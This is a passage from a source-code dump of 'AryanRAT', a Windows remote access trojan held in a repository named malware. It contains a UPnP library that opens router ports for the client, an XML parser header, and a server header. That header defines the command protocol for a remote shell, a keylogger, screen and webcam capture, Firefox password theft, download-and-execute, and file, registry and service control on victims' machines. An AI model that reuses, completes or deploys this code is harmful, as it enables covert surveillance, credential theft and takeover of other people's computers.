248 | #endif
249 | #endif
250 |
--------------------------------------------------------------------------------
/AryanRAT/Client/upnpnat.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #pragma comment(lib,"ws2_32.lib")
3 | #include
4 | #include
5 |
6 | #include "upnpnat.h"
7 | #include "xmlParser.h"
8 |
9 | #define MAX_BUFF_SIZE 102400
10 |
11 | static bool parseUrl(const char* url,std::string& host,unsigned short* port,std::string& path)
12 | {
13 | std::string str_url=url;
14 |
15 | std::string::size_type pos1,pos2,pos3;
16 | pos1=str_url.find("://");
17 | if(pos1==std::string::npos)
18 | {
19 | return false;
20 | }
21 | pos1=pos1+3;
22 |
23 | pos2=str_url.find(":",pos1);
24 | if(pos2==std::string::npos)
25 | {
26 | *port=80;
27 | pos3=str_url.find("/",pos1);
28 | if(pos3==std::string::npos)
29 | {
30 | return false;
31 | }
32 |
33 | host=str_url.substr(pos1,pos3-pos1);
34 | }
35 | else
36 | {
37 | host=str_url.substr(pos1,pos2-pos1);
38 | pos3=str_url.find("/",pos1);
39 | if(pos3==std::string::npos)
40 | {
41 | return false;
42 | }
43 |
44 | std::string str_port=str_url.substr(pos2+1,pos3-pos2-1);
45 | *port=(unsigned short)atoi(str_port.c_str());
46 | }
47 |
48 | if(pos3+1>=str_url.size())
49 | {
50 | path="/";
51 | }
52 | else
53 | {
54 | path=str_url.substr(pos3,str_url.size());
55 | }
56 |
57 | return true;
58 | }
59 |
60 |
61 | /******************************************************************
62 | ** Discovery Defines *
63 | *******************************************************************/
64 | #define HTTPMU_HOST_ADDRESS "239.255.255.250"
65 | #define HTTPMU_HOST_PORT 1900
66 | #define SEARCH_REQUEST_STRING "M-SEARCH * HTTP/1.1\r\n" \
67 | "ST:UPnP:rootdevice\r\n" \
68 | "MX: 3\r\n" \
69 | "Man:\"ssdp:discover\"\r\n" \
70 | "HOST: 239.255.255.250:1900\r\n" \
71 | "\r\n"
72 | #define HTTP_OK "200 OK"
73 | #define DEFAULT_HTTP_PORT 80
74 |
75 |
76 | /******************************************************************
77 | ** Device and Service Defines *
78 | *******************************************************************/
79 |
80 | #define DEVICE_TYPE_1 "urn:schemas-upnp-org:device:InternetGatewayDevice:1"
81 | #define DEVICE_TYPE_2 "urn:schemas-upnp-org:device:WANDevice:1"
82 | #define DEVICE_TYPE_3 "urn:schemas-upnp-org:device:WANConnectionDevice:1"
83 |
84 | #define SERVICE_WANIP "urn:schemas-upnp-org:service:WANIPConnection:1"
85 | #define SERVICE_WANPPP "urn:schemas-upnp-org:service:WANPPPConnection:1"
86 |
87 |
88 | /******************************************************************
89 | ** Action Defines *
90 | *******************************************************************/
91 | #define HTTP_HEADER_ACTION "POST %s HTTP/1.1\r\n" \
92 | "HOST: %s:%u\r\n" \
93 | "SOAPACTION:\"%s#%s\"\r\n" \
94 | "CONTENT-TYPE: text/xml ; charset=\"utf-8\"\r\n"\
95 | "Content-Length: %d \r\n\r\n"
96 |
97 | #define SOAP_ACTION "\r\n" \
98 | "\r\n" \
102 | "\r\n" \
103 | "\r\n%s" \
104 | "\r\n" \
105 | "\r\n" \
106 | "\r\n"
107 |
108 | #define PORT_MAPPING_LEASE_TIME "63072000" //two year
109 |
110 | #define ADD_PORT_MAPPING_PARAMS "\r\n" \
111 | "%u\r\n"\
112 | "%s\r\n" \
113 | "%u\r\n"\
114 | "%s\r\n" \
115 | "1\r\n" \
116 | "%s\r\n" \
117 | "" \
118 | PORT_MAPPING_LEASE_TIME \
119 | "\r\n"
120 |
121 | #define ACTION_ADD "AddPortMapping"
122 | //*********************************************************************************
123 |
124 |
125 | bool UPNPNAT::init(int time,int inter)
126 | {
127 | time_out=time;
128 | interval=inter;
129 | status=NAT_INIT;
130 |
131 | WORD wVersionRequested;
132 | WSADATA wsaData;
133 | int err;
134 | wVersionRequested = MAKEWORD (2, 2);
135 | err = WSAStartup (wVersionRequested, &wsaData);
136 | if(err != 0)
137 | return false;
138 | return true;
139 | }
140 |
141 | bool UPNPNAT::tcp_connect(const char * _host,unsigned short int _port)
142 | {
143 | int ret,i;
144 | tcp_socket_fd=socket(AF_INET,SOCK_STREAM,0);
145 | struct sockaddr_in r_address;
146 |
147 | r_address.sin_family = AF_INET;
148 | r_address.sin_port=htons(_port);
149 | r_address.sin_addr.s_addr=inet_addr(_host);
150 |
151 | for(i=1;i<=time_out;i++)
152 | {
153 | if(i>1)
154 | _sleep(1000);
155 |
156 | ret=connect(tcp_socket_fd,(const struct sockaddr *)&r_address,sizeof(struct sockaddr_in) );
157 | if(ret==0)
158 | {
159 | status=NAT_TCP_CONNECTED;
160 | return true;
161 | }
162 | }
163 |
164 | status=NAT_ERROR;
165 | char temp[100];
166 | sprintf(temp,"Fail to connect to %s:%i (using TCP)\n",_host,_port);
167 | last_error=temp;
168 |
169 | return false;
170 | }
171 |
172 | bool UPNPNAT::discovery()
173 | {
174 | udp_socket_fd=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
175 | int i,ret;
176 | std::string send_buff=SEARCH_REQUEST_STRING;
177 | std::string recv_buff;
178 | char buff[MAX_BUFF_SIZE+1]; //buff should be enough big
179 |
180 | struct sockaddr_in r_address;
181 | r_address.sin_family=AF_INET;
182 | r_address.sin_port=htons(HTTPMU_HOST_PORT);
183 | r_address.sin_addr.s_addr=inet_addr(HTTPMU_HOST_ADDRESS);
184 |
185 | bool bOptVal = true;
186 | int bOptLen = sizeof(bool);
187 | int iOptLen = sizeof(int);
188 |
189 | ret=setsockopt(udp_socket_fd, SOL_SOCKET, SO_BROADCAST, (char*)&bOptVal, bOptLen);
190 |
191 | ret=sendto(udp_socket_fd,send_buff.c_str(),send_buff.size(),0,(struct sockaddr*)&r_address,sizeof(struct sockaddr_in));
192 |
193 | for(i=1;i<=time_out;i++)
194 | {
195 | u_long val = 1;
196 | ioctlsocket (udp_socket_fd,FIONBIO,&val);//none block
197 |
198 | memset(buff, 0, sizeof(buff));
199 | ret=recvfrom(udp_socket_fd,buff,MAX_BUFF_SIZE,0,NULL,NULL);
200 | if(ret==SOCKET_ERROR){
201 | _sleep(1000);
202 | continue;
203 | }
204 |
205 | recv_buff=buff;
206 | ret=recv_buff.find(HTTP_OK);
207 | if(ret==std::string::npos)
208 | continue; //invalid response
209 |
210 | std::string::size_type begin=recv_buff.find("http://");
211 | if(begin==std::string::npos)
212 | continue; //invalid response
213 | std::string::size_type end=recv_buff.find("\r",begin);
214 | if(end==std::string::npos)
215 | continue; //invalid response
216 |
217 | describe_url=describe_url.assign(recv_buff,begin,end-begin);
218 |
219 | if(!get_description()){
220 | _sleep(1000);
221 | continue;
222 | }
223 |
224 | if(!parser_description()){
225 | _sleep(1000);
226 | continue;
227 | }
228 |
229 | closesocket(udp_socket_fd);
230 | status=NAT_FOUND; //find a router
231 | return true ;
232 | }
233 |
234 | status=NAT_ERROR;
235 | last_error="Fail to find an UPNP NAT.\n";
236 |
237 | return false; //no router finded
238 | }
239 |
240 | bool UPNPNAT::get_description()
241 | {
242 | std::string host,path;
243 | unsigned short int port;
244 | int ret=parseUrl(describe_url.c_str(),host,&port,path);
245 | if(!ret)
246 | {
247 | status=NAT_ERROR;
248 | last_error="Failed to parseURl: "+describe_url+"\n";
249 | return false;
250 | }
251 |
252 | //connect
253 | ret=tcp_connect(host.c_str(),port);
254 | if(!ret){
255 | return false;
256 | }
257 |
258 | char request[200];
259 | sprintf (request,"GET %s HTTP/1.1\r\nHost: %s:%d\r\n\r\n",path.c_str(),host.c_str(),port);
260 | std::string http_request=request;
261 |
262 | //send request
263 | ret=send(tcp_socket_fd,http_request.c_str(),http_request.size(),0);
264 | //get description xml file
265 | char buff[MAX_BUFF_SIZE+1];
266 | memset(buff, 0, sizeof(buff));
267 | std::string response;
268 | while ( ret=recv(tcp_socket_fd,buff,MAX_BUFF_SIZE,0) >0)
269 | {
270 | response+=buff;
271 | memset(buff, 0, sizeof(buff));
272 | }
273 |
274 | description_info=response;
275 |
276 | return true;
277 | }
278 |
279 | bool UPNPNAT::parser_description()
280 | {
281 | XMLNode node=XMLNode::parseString(description_info.c_str(),"root");
282 | if(node.isEmpty())
283 | {
284 | status=NAT_ERROR;
285 | last_error="The device descripe XML file is not a valid XML file. Cann't find root element.\n";
286 | return false;
287 | }
288 |
289 | XMLNode baseURL_node=node.getChildNode("URLBase",0);
290 | if(!baseURL_node.getText())
291 | {
292 | std::string::size_type index=describe_url.find("/",7);
293 | if(index==std::string::npos )
294 | {
295 | status=NAT_ERROR;
296 | last_error="Fail to get base_URL from XMLNode \"URLBase\" or describe_url.\n";
297 | return false;
298 | }
299 | base_url=base_url.assign(describe_url,0,index);
300 | }
301 | else
302 | base_url=baseURL_node.getText();
303 |
304 | int num,i;
305 | XMLNode device_node,deviceList_node,deviceType_node;
306 | num=node.nChildNode("device");
307 | for(i=0;iservice_type=serviceType;
413 |
414 | XMLNode controlURL_node=service_node.getChildNode("controlURL");
415 | control_url=controlURL_node.getText();
416 |
417 | //make the complete control_url;
418 | if(control_url.find("http://")==std::string::npos&&control_url.find("HTTP://")==std::string::npos)
419 | control_url=base_url+control_url;
420 | if(service_describe_url.find("http://")==std::string::npos&&service_describe_url.find("HTTP://")==std::string::npos)
421 | service_describe_url=base_url+service_describe_url;
422 |
423 | closesocket(tcp_socket_fd);
424 | status=NAT_GETCONTROL;
425 | return true;
426 | }
427 |
428 |
429 | bool UPNPNAT::add_port_mapping(char * _description, char * _destination_ip, unsigned short int _port_ex, unsigned short int _port_in, char * _protocal)
430 | {
431 | int ret;
432 |
433 | std::string host,path;
434 | unsigned short int port;
435 | ret=parseUrl(control_url.c_str(),host,&port,path);
436 | if(!ret)
437 | {
438 | status=NAT_ERROR;
439 | last_error="Fail to parseURl: "+describe_url+"\n";
440 | return false;
441 | }
442 |
443 | //connect
444 | ret=tcp_connect(host.c_str(),port);
445 | if(!ret)
446 | return false;
447 |
448 | char buff[MAX_BUFF_SIZE+1];
449 | sprintf(buff,ADD_PORT_MAPPING_PARAMS,_port_ex,_protocal,_port_in,_destination_ip,_description);
450 | std::string action_params=buff;
451 |
452 | sprintf(buff,SOAP_ACTION,ACTION_ADD,service_type.c_str(),action_params.c_str(),ACTION_ADD);
453 | std::string soap_message=buff;
454 |
455 | sprintf(buff,HTTP_HEADER_ACTION,path.c_str(),host.c_str(),port,service_type.c_str(),ACTION_ADD,soap_message.size());
456 | std::string action_message=buff;
457 |
458 | std::string http_request=action_message+soap_message;
459 |
460 | //send request
461 | ret=send(tcp_socket_fd,http_request.c_str(),http_request.size(),0);
462 |
463 | //wait for response
464 | std::string response;
465 | memset(buff, 0, sizeof(buff));
466 | while (ret=recv(tcp_socket_fd,buff,MAX_BUFF_SIZE,0) >0)
467 | {
468 | response+=buff;
469 | memset(buff, 0, sizeof(buff));
470 | }
471 |
472 | if(response.find(HTTP_OK)==std::string::npos)
473 | {
474 | status=NAT_ERROR;
475 | char temp[100];
476 | sprintf(temp,"Fail to add port mapping (%s/%s)\n",_description,_protocal);
477 | last_error=temp;
478 | return false;
479 | }
480 |
481 | closesocket(tcp_socket_fd);
482 | status=NAT_ADD;
483 | return true;
484 | }
485 |
486 |
--------------------------------------------------------------------------------
/AryanRAT/Client/upnpnat.h:
--------------------------------------------------------------------------------
1 | #ifndef UPNPNAT_H
2 | #define UPNPNAT_H
3 |
4 | #include
5 | #include
6 |
7 | #pragma warning(disable: 4251)
8 |
9 | #define DefaultTimeOut 10
10 | #define DefaultInterval 200
11 |
12 | class __declspec (dllexport) UPNPNAT
13 | {
14 | public:
15 |
16 | bool init(int time_out=DefaultTimeOut,int interval=DefaultInterval); //init
17 | bool discovery();//find router
18 |
19 | /****
20 | **** _description: port mapping name
21 | **** _destination_ip: internal ip address
22 | **** _port_ex:external: external listen port
23 | **** _destination_port: internal port
24 | **** _protocal: TCP or UDP
25 | ***/
26 | bool add_port_mapping(char * _description, char * _destination_ip, unsigned short int _port_ex, unsigned short int _destination_port, char * _protocal);//add port mapping
27 |
28 | const char * get_last_error(){ return last_error.c_str();}//get last error
29 | private:
30 | bool get_description(); //
31 | bool parser_description(); //
32 | bool tcp_connect(const char * _addr,unsigned short int _port);
33 | bool parse_mapping_info();
34 | int udp_socket_fd;
35 | int tcp_socket_fd;
36 | typedef enum
37 | {
38 | NAT_INIT=0,
39 | NAT_FOUND,
40 | NAT_TCP_CONNECTED,
41 | NAT_GETDESCRIPTION,
42 | NAT_GETCONTROL,
43 | NAT_ADD,
44 | NAT_DEL,
45 | NAT_GET,
46 | NAT_ERROR
47 | } NAT_STAT;
48 | NAT_STAT status;
49 | int time_out;
50 | int interval;
51 | std::string service_type;
52 | std::string describe_url;
53 | std::string control_url;
54 | std::string base_url;
55 | std::string service_describe_url;
56 | std::string description_info;
57 | std::string last_error;
58 | std::string mapping_info;
59 | };
60 |
61 | #endif
62 |
63 |
--------------------------------------------------------------------------------
/AryanRAT/Client/xmlParser.h:
--------------------------------------------------------------------------------
1 | #ifndef __INCLUDE_XML_NODE__
2 | #define __INCLUDE_XML_NODE__
3 |
4 | #include
5 |
6 | #ifdef WIN32
7 | #include
8 | #endif
9 |
10 | // Some common types for char set portable code
11 | #ifdef _UNICODE
12 | #ifndef LPCTSTR
13 | #define LPCTSTR const unsigned short *
14 | #endif /* LPCTSTR */
15 | #ifndef LPTSTR
16 | #define LPTSTR unsigned short*
17 | #endif /* LPTSTR */
18 | #ifndef TCHAR
19 | #define TCHAR unsigned short
20 | #endif /* TCHAR */
21 | #else
22 | #ifndef LPCTSTR
23 | #define LPCTSTR const char *
24 | #endif /* LPCTSTR */
25 | #ifndef LPTSTR
26 | #define LPTSTR char *
27 | #endif /* LPTSTR */
28 | #ifndef TCHAR
29 | #define TCHAR char
30 | #endif /* TCHAR */
31 | #endif
32 | #ifndef FALSE
33 | #define FALSE 0
34 | #endif /* FALSE */
35 | #ifndef TRUE
36 | #define TRUE 1
37 | #endif /* TRUE */
38 |
39 | #ifndef WIN32
40 | #define _T(c) c
41 | #endif
42 |
43 | // Enumeration for XML parse errors.
44 | typedef enum XMLError
45 | {
46 | eXMLErrorNone = 0,
47 | eXMLErrorMissingEndTag,
48 | eXMLErrorEmpty,
49 | eXMLErrorFirstNotStartTag,
50 | eXMLErrorMissingTagName,
51 | eXMLErrorMissingEndTagName,
52 | eXMLErrorNoMatchingQuote,
53 | eXMLErrorUnmatchedEndTag,
54 | eXMLErrorUnexpectedToken,
55 | eXMLErrorInvalidTag,
56 | eXMLErrorNoElements,
57 | eXMLErrorFileNotFound,
58 | eXMLErrorTagNotFound
59 | } XMLError;
60 |
61 | // Enumeration used to manage type of data. Use in conjonction with structure XMLNodeContents
62 | typedef enum XMLElementType
63 | {
64 | eNodeChild=0,
65 | eNodeAttribute=1,
66 | eNodeText=2,
67 | eNodeClear=3,
68 | eNodeNULL=4
69 | } XMLElementType;
70 |
71 | // Structure used to obtain error details if the parse fails.
72 | typedef struct XMLResults
73 | {
74 | enum XMLError error;
75 | int nLine,nColumn;
76 | } XMLResults;
77 |
78 | // Structure for XML clear (unformatted) node (usually comments)
79 | typedef struct {
80 | LPCTSTR lpszOpenTag; LPCTSTR lpszValue; LPCTSTR lpszCloseTag;
81 | } XMLClear;
82 |
83 | // Structure for XML attribute.
84 | typedef struct {
85 | LPCTSTR lpszName; LPCTSTR lpszValue;
86 | } XMLAttribute;
87 |
88 | struct XMLNodeContents;
89 |
90 | typedef struct XMLNode
91 | {
92 | // friend class XMLNode;
93 | protected:
94 | typedef struct // to allow shallow copy and "intelligent/smart" pointers (automatic delete):
95 | {
96 | LPCTSTR lpszName; // Element name (=NULL if root)
97 | int nChild, // Num of child nodes
98 | nText, // Num of text fields
99 | nClear, // Num of Clear fields (comments)
100 | nAttribute, // Num of attributes
101 | isDeclaration; // Whether node is an XML declaration - ''
102 | XMLNode *pParent; // Pointer to parent element (=NULL if root)
103 | XMLNode *pChild; // Array of child nodes
104 | LPCTSTR *pText; // Array of text fields
105 | XMLClear *pClear; // Array of clear fields
106 | XMLAttribute *pAttribute; // Array of attributes
107 | int *pOrder; // order in which the child_nodes,text_fields,clear_fields and
108 | int ref_count;
109 | } XMLNodeData;
110 | XMLNodeData *d;
111 |
112 | // protected constructor: use one of these four methods to get your first instance of XMLNode:
113 | // - parseString
114 | // - parseFile
115 | // - openFileHelper
116 | // - createXMLTopNode
117 | XMLNode(XMLNode *pParent, LPCTSTR lpszName, int isDeclaration);
118 |
119 | public:
120 |
121 | // You must create your first instance of XMLNode with these 3 parse functions:
122 | // (see complete explanation of parameters below)
123 |
124 | static XMLNode parseString (LPCTSTR lpszXML, LPCTSTR tag=NULL, XMLResults *pResults=NULL);
125 | static XMLNode parseFile (const char *lpszXML, LPCTSTR tag=NULL, XMLResults *pResults=NULL);
126 | static XMLNode openFileHelper(const char *lpszXML, LPCTSTR tag);
127 |
128 | // The tag parameter should be the name of the first tag inside the XML file.
129 | // If the tag parameter is omitted, the 3 functions return a node that represents
130 | // the head of the xml document including the declaration term ().
131 |
132 | // If the XML document is corrupted:
133 | // - The "openFileHelper" method will stop execution and display an error message.
134 | // - The 2 other methods will initialize the "pResults" variable with some information that
135 | // can be used to trace the error.
136 | // you can have a detailed explanation of the parsing error with this function:
137 |
138 | static LPCTSTR getError(XMLError error);
139 |
140 | LPCTSTR getName(); // name of the node
141 | LPCTSTR getText(int i=0); // return ith text field
142 | int nText(); // nbr of text field
143 | XMLNode getChildNode(int i); // return ith child node
144 | XMLNode getChildNode(LPCTSTR name, int i); // return ith child node with specific name
145 | // (return an empty node if failing)
146 | XMLNode getChildNode(LPCTSTR name, int *i=NULL); // return next child node with specific name
147 | // (return an empty node if failing)
148 | int nChildNode(LPCTSTR name); // return the number of child node with specific name
149 | int nChildNode(); // nbr of child node
150 | XMLAttribute getAttribute(int i); // return ith attribute
151 | char isAttributeSet(LPCTSTR name); // test if an attribute with a specific name is given
152 | LPCTSTR getAttribute(LPCTSTR name, int i); // return ith attribute content with specific name
153 | // (return a NULL if failing)
154 | LPCTSTR getAttribute(LPCTSTR name, int *i=NULL); // return next attribute content with specific name
155 | // (return a NULL if failing)
156 | int nAttribute(); // nbr of attribute
157 | XMLClear getClear(int i); // return ith clear field (comment)
158 | int nClear(); // nbr of clear field
159 | LPTSTR createXMLString(int nFormat, int *pnSize=NULL); // create XML string starting from current XMLNode
160 | XMLNodeContents enumContents(int i); // enumerate all the different contents (child,text,
161 | // clear,attribute) of the current XMLNode. The order
162 | // is reflecting the order of the original file/string
163 | int nElement(); // nbr of different contents for current node
164 | char isEmpty(); // is this node Empty?
165 | char isDeclaration();
166 |
167 | // to allow shallow copy:
168 | ~XMLNode();
169 | XMLNode(const XMLNode &A);
170 | XMLNode& operator=( const XMLNode& A );
171 | static void destroyCurrentBuffer(XMLNodeData *d);
172 |
173 | XMLNode(): d(NULL){};
174 | static XMLNode emptyXMLNode;
175 | static XMLClear emptyXMLClear;
176 | static XMLAttribute emptyXMLAttribute;
177 |
178 | // The following functions allows you to create from scratch a XMLNode structure
179 | // The strings given as parameters for these methods will be free'd by the XMLNode class:
180 | static XMLNode createXMLTopNode();
181 | XMLNode addChild(LPCTSTR lpszName, int isDeclaration=FALSE);
182 | XMLAttribute *addAttribute(LPCTSTR lpszName, LPCTSTR lpszValuev);
183 | LPCTSTR addText(LPCTSTR lpszValue);
184 | XMLClear *addClear(LPCTSTR lpszValue, LPCTSTR lpszOpen, LPCTSTR lpszClose);
185 |
186 | private:
187 |
188 | // these are functions used internally (don't bother about them):
189 | int ParseClearTag(void *pXML, void *pClear);
190 | int ParseXMLElement(void *pXML);
191 | void addToOrder(int index, int type);
192 | static int CreateXMLStringR(XMLNodeData *pEntry, LPTSTR lpszMarker, int nFormat);
193 | static void *enumContent(XMLNodeData *pEntry,int i, XMLElementType *nodeType);
194 | static int nElement(XMLNodeData *pEntry);
195 | static void removeOrderElement(XMLNodeData *d, XMLElementType t, int index);
196 | static void exactMemory(XMLNodeData *d);
197 | } XMLNode;
198 |
199 |
200 | // This structure is given by the function "enumContents".
201 | typedef struct XMLNodeContents
202 | {
203 | // This dictates what's the content of the XMLNodeContent
204 | enum XMLElementType type;
205 | // should be an union to access the appropriate data.
206 | // compiler does not allow union of object with constructor... too bad.
207 | XMLNode child;
208 | XMLAttribute attrib;
209 | LPCTSTR text;
210 | XMLClear clear;
211 |
212 | } XMLNodeContents;
213 |
214 | // The 2 following functions are processing strings so that all the characters
215 | // &,",',<,> are replaced by their XML equivalent: &, ", ', <, >.
216 | // The second function ("toXMLStringFast") allows you to re-use the same output
217 | // buffer for all the conversions so that only a few memory allocations are performed.
218 | // If the output buffer is too small to contain the resulting string, it will
219 | // be enlarged. These 2 functions are useful when creating from scratch an
220 | // XML file using printf.
221 | LPTSTR toXMLString(LPCTSTR source);
222 | LPTSTR toXMLStringFast(LPTSTR *destBuffer,int *destSz, LPCTSTR source);
223 | // you should not use this one:
224 | LPTSTR toXMLString(LPTSTR dest,LPCTSTR source);
225 |
226 | // duplicate (copy in a new allocated buffer) the source string
227 | LPTSTR stringDup(LPCTSTR source, int cbData=0);
228 |
229 | #endif
230 |
--------------------------------------------------------------------------------
/AryanRAT/Client/yellow.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/yellow.ico
--------------------------------------------------------------------------------
/AryanRAT/ServerA/AryanServer.h:
--------------------------------------------------------------------------------
1 | #ifndef __AryanServer_h
2 | #define __AryanServer_h
3 |
4 | /////////////////////////////////////////////////
5 | #define STATUS 1990
6 | #define PACKET_ADD_ID 1991
7 | #define PACKET_USER_JOINED 1992
8 | #define PACKET_EXIT 1993
9 | /////////////////////////////////////////////////
10 | //Shell Packet headers
11 | #define PACKET_CMD_RECV 2000
12 | #define PACKET_REMOTE_SHELL_START 2001
13 | /////////////////////////////////////////////////
14 | //Task manager Packet headers
15 | #define PACKET_TASK_MANAGER 2002
16 | #define PACKET_TASK_MANAGER_KILL 2003
17 | #define PACKET_TASK_MANAGER_TASKS 2004
18 | #define PACKET_TASK_MANAGER_KTASK 2005
19 | #define PACKET_TASK_MANAGER_TEXT 2006
20 | /////////////////////////////////////////////////
21 | //File manager Packet headers
22 | #define PACKET_FILE_MANAGER_DRIVE 2010
23 | #define PACKET_FILE_MANAGER_FOLDER 2011
24 | #define PACKET_FILE_MANAGER_FILE 2012
25 | #define PACKET_FILE_MANAGER_FILE_FOLDER 2013
26 | #define PACKET_FILE_MANAGER_FILE_COPY 2014
27 | #define PACKET_FILE_MANAGER_NEW_FOLDER 2015
28 | #define PACKET_FILE_MANAGER_DELETE_FILE 2016
29 | #define PACKET_FILE_MANAGER_FILE_CUT 2017
30 | #define PACKET_FILE_MANAGER_FILE_RENAME 2018
31 | #define PACKET_FILE_MANAGER_FILE_RECV_S 2019
32 | #define PACKET_FILE_MANAGER_FILE_RECV 2020
33 | #define PACKET_FILE_MANAGER_FILE_C 2021
34 | #define PACKET_FILE_MANAGER_FILE_DOWN 2022
35 | #define PACKET_FILE_MANAGER_FILE_UPDATE_WIN 2023
36 | #define PACKET_FILE_MANAGER_SEARCH 2024
37 | #define DONE 2025
38 | #define PACKET_FILE_MANAGER_FILE_EXECUTE 2026
39 | #define PACKET_FILE_MANAGER_FILE_OPEN 2027
40 | #define PACKET_FILE_DOWNLOAD_STAT 2028
41 | /////////////////////////////////////////////////
42 | //Computer Packet headers
43 | #define PACKET_COMPUTER_LOGOFF 2030
44 | #define PACKET_COMPUTER_SHUTDOWN 2031
45 | #define PACKET_COMPUTER_LOCK 2032
46 | /////////////////////////////////////////////////
47 | //Keylogger Packet headers
48 | #define PACKET_KEYLOGGER 2060
49 | #define PACKET_KEYLOGGER_WINDOW 2061
50 | #define PACKET_KEYLOGGER_OFF 2062
51 | #define PACKET_KEYLOG_OFFLINE 2063
52 | #define PACKET_KEYLOG_DOWNLOAD 2064
53 | #define PACKET_KEYLOG_OPEN 2065
54 | #define PACKET_KEYLOG_DOWNLOAD_UPDATE 2066
55 | /////////////////////////////////////////////////
56 | #define PACKET_RESUME 2040
57 | //////////////////////////////////////////////////
58 | //Screen capture
59 | #define SCREEN_CAPTURE 2050
60 | #define SCREEN_SHOT_OPEN 2051
61 | #define SCREEN_SHOT_CLOSE 2052
62 | #define SCREEN_SHOT_RECV 2053
63 | //////////////////////////////////////////////////
64 | //Passwords
65 | #define PASSWORD_FIREFOX 2070
66 | ////////////////////////////////////////////////
67 | //Services
68 | #define PACKET_SERVICE_MAN 2080
69 | #define PACKET_SERVICE_STARTA 2081
70 | #define PACKET_SERVICE_STOPA 2082
71 | ////////////////////////////////////////////////
72 | //RegManager
73 | #define PACKET_REG_MANAGER 2090
74 | ////////////////////////////////////////////////
75 | //Packet Structer
76 | #define PACKET_DOWNLOAD_EXECUTE 3000
77 | ////////////////////////////////////////////////
78 | //Query Installs
79 | #define PACKET_PROGRAM_FILES 3010
80 | #define EXECUTE 3011
81 | ////////////////////////////////////////////////
82 | #define WEBCAM_CAPTURE 3020
83 | ////////////////////////////////////////////////
84 | #define FUN_MONITOR_ON 3030
85 | #define FUN_MONITOR_OFF 3031
86 | #define FUN_OPEN_CD 3032
87 | #define FUN_CLOSE_CD 3033
88 | #define FUN_INVERT_SCREEN_COLOUR 3034
89 |
90 | #define MAX_KEY_LENGTH 255
91 | #define MAX_VALUE_NAME 16383
92 |
93 | #define MAX_LOADSTRING 100
94 | #define HIMETRIC_INCH 2540
95 | #define MAP_LOGHIM_TO_PIX(x,ppli) ( ((ppli)*(x) + HIMETRIC_INCH/2) / HIMETRIC_INCH )
96 |
97 | typedef struct {
98 | WORD x,y; // dimensions
99 | WORD l; // bytes per scan-line (32-bit allignment)
100 | BYTE *b; // bits of bitmap,3 bytes/pixel, BGR
101 | } tWorkBMP; // 24-bit working bitmap
102 |
103 | struct PACKETHEAD
104 | { DWORD PacketType;
105 | char Data [512];
106 | char PID [50];
107 | char Threads [50];
108 | char ParentPID [50];
109 | char PRIORITY [50];
110 | char Buf [100];
111 | char Buf2 [50];
112 | char Buf3 [50];
113 | char IDS [10];
114 | int ID;
115 | int ID2;
116 | int ID3;
117 | } ;
118 |
119 | typedef struct
120 | {
121 | DWORD PacketType;
122 | char Data [4096];
123 | int ID;
124 | int ID2;
125 | int ID3;
126 | int ID4;
127 | } PACKETFILE;
128 |
129 | typedef struct FFIND
130 | {
131 | char filename[100];
132 | char dirname[100];
133 | int threadnum;
134 | BOOL silent;
135 | BOOL gotinfo;
136 |
137 | } FFIND;
138 | #endif
--------------------------------------------------------------------------------
/AryanRAT/ServerA/AryanServerFWB.dsp:
--------------------------------------------------------------------------------
1 | # Microsoft Developer Studio Project File - Name="AryanServerFWB" - Package Owner=<4>
2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00
3 | # ** DO NOT EDIT **
4 |
5 | # TARGTYPE "Win32 (x86) Dynamic-Link Library" 0x0102
6 |
7 | CFG=AryanServerFWB - Win32 Debug
8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE,
9 | !MESSAGE use the Export Makefile command and run
10 | !MESSAGE
11 | !MESSAGE NMAKE /f "AryanServerFWB.mak".
12 | !MESSAGE
13 | !MESSAGE You can specify a configuration when running NMAKE
14 | !MESSAGE by defining the macro CFG on the command line. For example:
15 | !MESSAGE
16 | !MESSAGE NMAKE /f "AryanServerFWB.mak" CFG="AryanServerFWB - Win32 Debug"
17 | !MESSAGE
18 | !MESSAGE Possible choices for configuration are:
19 | !MESSAGE
20 | !MESSAGE "AryanServerFWB - Win32 Release" (based on "Win32 (x86) Dynamic-Link Library")
21 | !MESSAGE "AryanServerFWB - Win32 Debug" (based on "Win32 (x86) Dynamic-Link Library")
22 | !MESSAGE
23 |
24 | # Begin Project
25 | # PROP AllowPerConfigDependencies 0
26 | # PROP Scc_ProjName ""
27 | # PROP Scc_LocalPath ""
28 | CPP=cl.exe
29 | MTL=midl.exe
30 | RSC=rc.exe
31 |
32 | !IF "$(CFG)" == "AryanServerFWB - Win32 Release"
33 |
34 | # PROP BASE Use_MFC 0
35 | # PROP BASE Use_Debug_Libraries 0
36 | # PROP BASE Output_Dir "Release"
37 | # PROP BASE Intermediate_Dir "Release"
38 | # PROP BASE Target_Dir ""
39 | # PROP Use_MFC 0
40 | # PROP Use_Debug_Libraries 0
41 | # PROP Output_Dir "Release"
42 | # PROP Intermediate_Dir "Release"
43 | # PROP Ignore_Export_Lib 0
44 | # PROP Target_Dir ""
45 | # ADD BASE CPP /nologo /MT /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "ARYANSERVERFWB_EXPORTS" /YX /FD /c
46 | # ADD CPP /nologo /MT /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "ARYANSERVERFWB_EXPORTS" /YX /FD /c
47 | # ADD BASE MTL /nologo /D "NDEBUG" /mktyplib203 /win32
48 | # ADD MTL /nologo /D "NDEBUG" /mktyplib203 /win32
49 | # ADD BASE RSC /l 0x809 /d "NDEBUG"
50 | # ADD RSC /l 0x809 /d "NDEBUG"
51 | BSC32=bscmake.exe
52 | # ADD BASE BSC32 /nologo
53 | # ADD BSC32 /nologo
54 | LINK32=link.exe
55 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /machine:I386
56 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib gdiplus.lib Winmm.lib /nologo /dll /machine:I386
57 |
